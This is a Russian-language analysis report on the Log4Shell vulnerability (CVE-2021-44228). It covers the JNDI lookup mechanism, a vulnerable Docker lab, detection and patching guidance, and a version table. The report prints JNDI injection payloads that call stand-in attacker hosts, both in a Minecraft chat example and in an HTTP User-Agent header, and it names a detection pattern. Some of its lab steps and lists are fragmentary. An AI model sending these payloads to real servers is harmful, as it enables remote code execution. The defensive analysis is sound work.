
CVE-2021-44228
이글루코퍼레이션 원치현 Log4shell 분석보고서 (Это название отчета, оставляем как есть, так как это названия корейской компании и автора)
CVE-2021-44228 Log4j — это бесплатная библиотека с открытым исходным кодом от Apache Software Foundation, основанная на Java. Она используется для ведения журналов во всех Java-приложениях. JDNI (Java Naming and Directory Interface) предоставляет данные и объекты, а JNDI Lookup в LDAP (порт 1389) позволяет обращаться к ресурсам, найденным через JNDI.
Скачивание Docker-образа для запуска уязвимого сервера:
sudo git clone
sudo docker build . -t vulnerable-app
Создание образа с именем vulnerable-app в текущей директории с помощью Docker build.
github.com/welk
Остановка неиспользуемого уязвимого сервера:
docker ps -a
Просмотр всех запущенных Docker-образов. Проверка идентификатора контейнера.
Log4Shell (CVE-2021-44228) — это уязвимость удаленного выполнения кода (RCE), обнаруженная в библиотеке Apache Log4j.
Злоумышленник может использовать вредоносную полезную нагрузку для выполнения произвольного кода, что может привести к масштабным последствиям.
Данный отчет анализирует принцип работы Log4Shell, его влияние, примеры эксплуатации, методы обнаружения и реагирования.
Log4Shell использует уязвимость функции JNDI Lookup (Java Naming and Directory Interface) для того, чтобы злоумышленник мог выполнить вредоносный код на удаленном сервере.
Злоумышленник может использовать уязвимость, просто оставив в журнале следующую строку:
${jndi:ldap://attacker.com:1389/exploit}
Уязвимость Log4Shell затронула множество корпоративных и общедоступных сервисов, использующих Log4j.
Злоумышленник мог ввести следующую строку в чат Minecraft, чтобы захватить сервер:
${jndi:ldap://attacker.com:1389/exploit}
Когда сервер записывает это в журнал, через JNDI Lookup выполняется вредоносный код с сервера злоумышленника.
В HTTP-запросы вставляются вредоносные полезные нагрузки в поля, которые записываются в журнал: User-Agent, Referer, X-Forwarded-For и другие. Пример:
GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
✅ Использование сканеров безопасности
✅ Проверка файлов журнала
${jndi:ldap://...}, необходимо немедленно реагировать.✅ Мониторинг сети
✅ Немедленные меры
-Dlog4j2.formatMsgNoLookups=true
jndi:ldap:// в брандмауэрах и IDS/IPS.✅ Долгосрочные меры безопасности
| Версия Log4j | Меры реагирования |
|---|---|
| 2.0-beta9 ~ 2.14.1 | Уязвимо, требуется обновление |
| 2.15.0 | JNDI Lookup отключен по умолчанию |
| 2.16.0 | Функция JNDI полностью удалена |
| 2.17.0 | Дополнительные меры усиления безопасности |
✅ Рекомендуется обновить до последней версии (2.17.1 и выше)!
Log4Shell (CVE-2021-44228) признан одной из самых серьезных уязвимостей безопасности за последние годы. ✅ Необходимо оперативно исправлять уязвимые системы и проводить непрерывный мониторинг безопасности. ✅ Все приложения, использующие Log4j, должны пройти проверку безопасности.
| Пункт | Описание |
|---|
| Название уязвимости | Log4Shell |
| Номер CVE | CVE-2021-44228 |
| Тип уязвимости | Удаленное выполнение кода (RCE) |
| Затронутые версии | Log4j 2.0-beta9 ~ 2.14.1 |
| Исправленная версия | Log4j 2.15.0 и выше |
| Сложность атаки | Низкая (для эксплуатации достаточно простого ввода строки) |
| Степень серьезности | 🔥 Критическая (CVSS 10.0) |